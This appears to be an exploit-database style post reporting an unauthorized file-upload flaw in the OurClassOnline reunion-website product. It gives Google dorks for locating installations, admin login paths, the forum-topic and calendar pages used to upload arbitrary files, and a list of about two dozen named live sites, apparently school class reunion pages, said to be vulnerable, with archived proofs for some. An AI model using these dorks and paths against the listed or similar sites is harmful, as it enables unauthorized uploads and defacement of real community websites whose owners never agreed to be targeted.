#################################################################################################
# Exploit Title : Web Portal People LLC 2018 OurClassOnline USA Unauthorized Arbitrary File Insert Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 13/11/2018
# Vendor Homepage : webportalpeople.com ~ ourclassonline.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dorks :
intext:''To obtain a site like this for your class visit www.ourclassonline.com.''
intext:''Copyright Web Portal People, LLC. 2018 - Maker of class reunion & family websites. All rights reserved.''
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
#################################################################################################
# Admin and Moderator Panel Login Paths :
/admin/index.php
/login_form.php?action=reunion
/login_form.php?action=news
/login_form.php?action=classmates
/login_form.php?action=gallery&galleryid=6
/login_form.php?action=gallery&galleryid=2
/login_form.php?action=gallery&galleryid=3
/login_form.php?action=year_review
/login_form.php?action=gallery&galleryid=4
#################################################################################################
# Exploit :
/forum_topic_create.php?forumid=1
/files_forum/[RANDOM-NUMBER]_[YOUR-FÄ°LENAME-HERE].txt
/calendar_add.php
/calendar_event.php?eventid=[RANDOM-NUMBER]
#################################################################################################
# Example Vulnerable Sites =>
[+] mcclintockhighchargers1968.com/forum_topic_create.php?forumid=1 => [ Proof of Concept ] => archive.is/YZhat
[+] tech1958.net/forum_topic_create.php?forumid=1 => [ Proof of Concept ] => archive.is/euIxf
[+] tempehighbuffs68.com/forum_topic_create.php?forumid=1
[+] orhs66.com/forum_topic_create.php?forumid=1
[+] denfeld59.com/forum_topic_create.php?forumid=1
[+] edison68.com/forum_topic_create.php?forumid=1
[+] edison64.com/forum_topic_create.php?forumid=1
[+] edison65.com/forum_topic_create.php?forumid=1
[+] marshalltown68.com/forum_topic_create.php?forumid=1
[+] ths1958.com/forum_topic_create.php?forumid=1
[+] marplenewtownhighschool1963.com/forum_topic_create.php?forumid=1
[+] hths74.com/forum_topic_create.php?forumid=1
[+] salemhighschool1959.com/forum_topic_create.php?forumid=1
[+] lchs1966bulldogs.com/forum_topic_create.php?forumid=1
[+] hooverhighclassof63.com/forum_topic_create.php?forumid=1
[+] marplenewtownhighschool1963.com/forum_topic_create.php?forumid=1
[+] phs1957.com/forum_topic_create.php?forumid=1
[+] redlandshigh65.com/forum_topic_create.php?forumid=1
[+] warrenmott1983.com/forum_topic_create.php?forumid=1
[+] dulutheast1965.com/forum_topic_create.php?forumid=1
[+] axemen68.org/forum_topic_create.php?forumid=1
[+] olympushigh1967.com/forum_topic_create.php?forumid=1
[+] leuzingerhigh1981.com/forum_topic_create.php?forumid=1
[+] bozemanhawks88.com/forum_topic_create.php?forumid=1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################